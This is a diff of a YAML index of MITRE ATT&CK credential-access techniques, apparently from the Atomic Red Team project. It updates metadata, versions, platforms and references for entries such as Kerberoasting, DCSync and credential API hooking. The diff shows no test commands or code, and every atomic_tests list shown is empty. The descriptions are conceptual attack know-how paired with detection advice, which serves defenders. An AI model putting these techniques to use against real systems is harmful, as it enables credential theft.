+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47586,6 +48284,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47596,23 +48295,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47683,9 +48409,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -47744,12 +48469,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -47781,6 +48505,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47790,7 +48515,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -47802,111 +48526,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -47917,26 +48579,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -47949,6 +48673,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -47985,17 +48710,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48041,81 +48766,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48128,28 +48782,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48206,9 +48926,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48239,7 +48958,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
